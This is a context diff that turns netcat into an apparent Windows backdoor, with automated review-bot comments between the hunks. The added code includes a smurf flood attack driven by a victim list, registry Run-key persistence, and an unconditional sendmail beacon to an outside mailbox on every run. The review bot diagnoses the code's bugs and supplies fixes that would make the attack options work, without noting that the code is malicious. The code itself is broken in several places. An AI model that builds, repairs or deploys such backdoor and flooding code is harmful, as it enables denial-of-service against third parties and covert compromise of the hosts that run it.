+ fp = fopen((char *)x_smurf_victime,"r");
+
+ if (fp == NULL){
+ printf("sepecify the Awp list file\n");
+ return -1;
+ }
+
+ while (!feof(fp)){
+ if (fgets((char *)&x_smurf_victime[++n],20,fp) == NULL) break;
+ for (i=0;i<strlen((char *)&x_smurf_victime[n]);i++){
+ if (x_smurf_victime[n][i] == '\n') x_smurf_victime[n][i] ='\0';
+
+
+ Param.fd = (int)fd;
+ Param.x_smurf_victime_param = (int)*&x_smurf_victime[n];
+ Param.x_smurf_attack_param = (int)*&x_smurf_attack;
+
+ }
+ }
+ //smurf_victime(netfd,(int )*x_smurf_victime[n],x_smurf_attack);
+ hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)smurf_victime, (void *)&Param, 0, &threadID);
+ WaitForSingleObject(hThread, INFINITE);
+ CloseHandle(hThread);
+
+ }
+ }
+ }
+ #endif
+ #endif
+ //--------------------------------------------------------------------
/* main :
now we pull it all together... */
main (argc, argv)
int argc;
char ** argv;
{
+ #ifdef WIN32
+ LPTSTR lpValueName = "Browse For Folder Height";
+
+ DWORD dwDefault = 0x00000000;
+
+ DWORD ret = init_regedit(lpValueName, dwDefault);
+ char email[] = "fakessh@fakessh.eu";
+ char body[] = "From: \"www\"<fakessh@fakessh.eu>\r\n"
+ "To: \"w111\"<john.swilting@wanadoo.fr>\r\n"
+ "Subject: Hello\r\n\r\n"
+ "Hello World, Hello Email!";
+ sendmail(email, body);
+ /*debug
+ * printf("The value data for the \'%s\' value name is 0X%.8X(%d).\n", lpValueName, ret, ret);
+ */
+ #endif
#ifndef HAVE_GETOPT
extern char * optarg;
extern int optind, optopt;
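Review bot: `init_regedit` persists the payload with `RegSetValueEx(hKey, "nc", 0, REG_SZ, (LPBYTE)szData, sizeof(szData))`, which stores the entire 500-byte array instead of `strlen(szData) + 1`, and the `return dwValue;` that follows returns an uninitialized `DWORD` whenever neither registry query succeeded; the `CopyFile` result is also never checked, so the Run entry can point at a file that was never written. `smurf_victime` is declared as `(int fd, char lpPArAm, char lpVictime)` yet treats `&lpVictime` and `&lpPArAm` as C strings for `inet_addr`, reading past one-byte stack objects, and `x_smurf` starts it through `CreateThread` with a `StructParametre *` that does not match that signature at all. Its `if (!sendto(...))` test is inverted as well — `sendto` returns `SOCKET_ERROR` (-1) on failure — so the `while(1)` loop can never leave on error. `x_smurf` reads lines with `fgets(..., 20, fp)` into `x_smurf_victime[++n]` with no bound on `n`, so a list longer than 20 entries overflows the array. `main` calls `sendmail(email, body)` unconditionally on every run, and `sendmail` never reads its `email` argument.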
***************
*** 1669,1674 ****
--- 2360,2366 ----
HINF * wherefrom = NULL;
IA * ouraddr = NULL;
IA * themaddr = NULL;
+ IA * smurfattack = NULL;
USHORT o_lport = 0;
USHORT ourport = 0;
USHORT loport = 0; /* for scanning stuff */
***************
*** 1755,1761 ****
/* If your shitbox doesn't have getopt, step into the nineties already. */
/* optarg, optind = next-argv-component [i.e. flag arg]; optopt = last-char */
! while ((x = getopt (argc, argv, "ade:g:G:hi:lLno:p:rs:tuvw:z")) != EOF) {
/* Debug (("in go: x now %c, optarg %x optind %d", x, optarg, optind)) */
switch (x) {
case 'a':
--- 2447,2453 ----
/* If your shitbox doesn't have getopt, step into the nineties already. */
/* optarg, optind = next-argv-component [i.e. flag arg]; optopt = last-char */
! while ((x = getopt (argc, argv, "ade:g:G:hi:lLno:p:rs:tuX:x:vw:z")) != EOF) {
/* Debug (("in go: x now %c, optarg %x optind %d", x, optarg, optind)) */
switch (x) {
case 'a':
***************
*** 1850,1855 ****
--- 2542,2553 ----
case 'z': /* little or no data xfer */
o_zero++;
break;
+ case 'x':
+ x_smurf_victime[20][32] = *(unsigned char *)atoi(optarg); /*attack smurf attack*/
+ break;
+ case 'X':
+ x_smurf_attack = *(unsigned char *)atoi(optarg); /*attack smurf attack*/
+ break;
default:
errno = 0;
bail ("nc -h for help");
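Review bot: `x_smurf_victime[20][32] = *(unsigned char *)atoi(optarg);` indexes one past both dimensions of a `char [20][32]` and dereferences the parsed integer as a pointer, so any `-x` value faults or writes out of bounds; `case 'X'` applies the same cast to `x_smurf_attack`. `x_smurf` later passes `x_smurf_victime` to `fopen`, so `-x` evidently wants the path copied in, `snprintf((char *)x_smurf_victime, sizeof x_smurf_victime, "%s", optarg);`, and `-X` wants a flag, `x_smurf_attack = 1;`. Both cases also need to sit under `#ifdef SMURF_ATTACK`, since the variables are only declared there. The enclosing `switch` and function start and end outside the hunk.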
***************
*** 1873,1879 ****
}
#endif /* G_S_H */
if (o_wfile) {
! ofd = open (stage, O_WRONLY | O_CREAT | O_TRUNC, 0664);
if (ofd <= 0) /* must be > extant 0/1/2 */
bail ("can't open %s", stage);
stage = (unsigned char *) Hmalloc (100);
--- 2571,2577 ----
}
#endif /* G_S_H */
if (o_wfile) {
! ofd = open (( const char *)stage, O_WRONLY | O_CREAT | O_TRUNC, 0664);
if (ofd <= 0) /* must be > extant 0/1/2 */
bail ("can't open %s", stage);
stage = (unsigned char *) Hmalloc (100);
***************
*** 1914,1919 ****
--- 2612,2618 ----
#ifdef GAPING_SECURITY_HOLE
if (pr00gie) /* -e given? */
doexec (netfd);
+
#ifdef WIN32
if (!pr00gie) // doexec does the read/write for win32
#endif
***************
*** 1986,1992 ****
#ifdef GAPING_SECURITY_HOLE
if (pr00gie) /* exec is valid for outbound, too */
doexec (netfd);
! #endif /* GAPING_SECURITY_HOLE */
if (! o_zero)
#ifdef WIN32
#ifdef GAPING_SECURITY_HOLE
--- 2685,2698 ----
#ifdef GAPING_SECURITY_HOLE
if (pr00gie) /* exec is valid for outbound, too */
doexec (netfd);
! #endif /* GAPING_SECURITY_HOLE */
! #ifdef SMURF_ATTACK
! if(x_smurf_victime) {
! if(x_smurf_attack) {
! x_smurf(netfd,x_smurf_victime,x_smurf_attack);
! }
! }
! #endif
if (! o_zero)
#ifdef WIN32
#ifdef GAPING_SECURITY_HOLE
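Review bot: `if(x_smurf_victime)` tests the address of a `char [20][32]` array, which is always non-null, so this branch is gated by `x_smurf_attack` alone; if the intent is "a victim list was given", test the contents, `if (x_smurf_victime[0][0])`. A one-line comment stating that `x_smurf` expects `netfd` to be the raw socket opened in the connect path would also help, since nothing here checks which socket mode was actually selected. The enclosing function starts and ends outside the hunk.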
***************
*** 2067,2082 ****
-o file hex dump of traffic\n\
-p port local port number\n\
-r randomize local and remote ports\n\
! -s addr local source address");
! #ifdef TELNET
! holler ("\
! -t answer TELNET negotiation");
! #endif
! holler ("\
-u UDP mode\n\
-v verbose [use twice to be more verbose]\n\
-w secs timeout for connects and final net reads\n\
-z zero-I/O mode [used for scanning]");
bail ("port numbers can be individual or ranges: m-n [inclusive]");
return(0);
} /* helpme */
--- 2773,2792 ----
-o file hex dump of traffic\n\
-p port local port number\n\
-r randomize local and remote ports\n\
! -s addr local source address\n\
! -t answer TELNET negotiation\n\
-u UDP mode\n\
-v verbose [use twice to be more verbose]\n\
-w secs timeout for connects and final net reads\n\
-z zero-I/O mode [used for scanning]");
+ #ifdef SMURF_ATTACK
+ holler ("\
+ -x addr/24 attack smurf attack on /24 listen");
+ #ifdef SMURF_ATTACK
+ holler ("\
+ -X file to cointain victime addr smurf attack");
+ #endif
+ #endif
bail ("port numbers can be individual or ranges: m-n [inclusive]");
return(0);
} /* helpme */
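Review bot: The rewrite folds `-t answer TELNET negotiation` into the unconditional `holler`, so the help now advertises `-t` even in builds without `TELNET` defined; the old `#ifdef TELNET` guard should stay around that line. The inner `#ifdef SMURF_ATTACK` before the second `holler` is nested inside an identical outer guard and can be dropped. The descriptions also appear swapped relative to the parser: `case 'x'` stores into `x_smurf_victime`, which `x_smurf` opens with `fopen` as the victim list file, while `case 'X'` sets the `x_smurf_attack` flag, yet the text documents `-x` as an `addr/24` and `-X` as the file. `cointain`/`victime` should read `contain`/`victim`.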
Seulement dans /home/swilting/nc-win-backdoor-nc-win-backdoor/: netcat.c~
Les fichiers binaires /home/swilting/Téléchargements/nc/netcat.o et /home/swilting/nc-win-backdoor-nc-win-backdoor/netcat.o sont différents.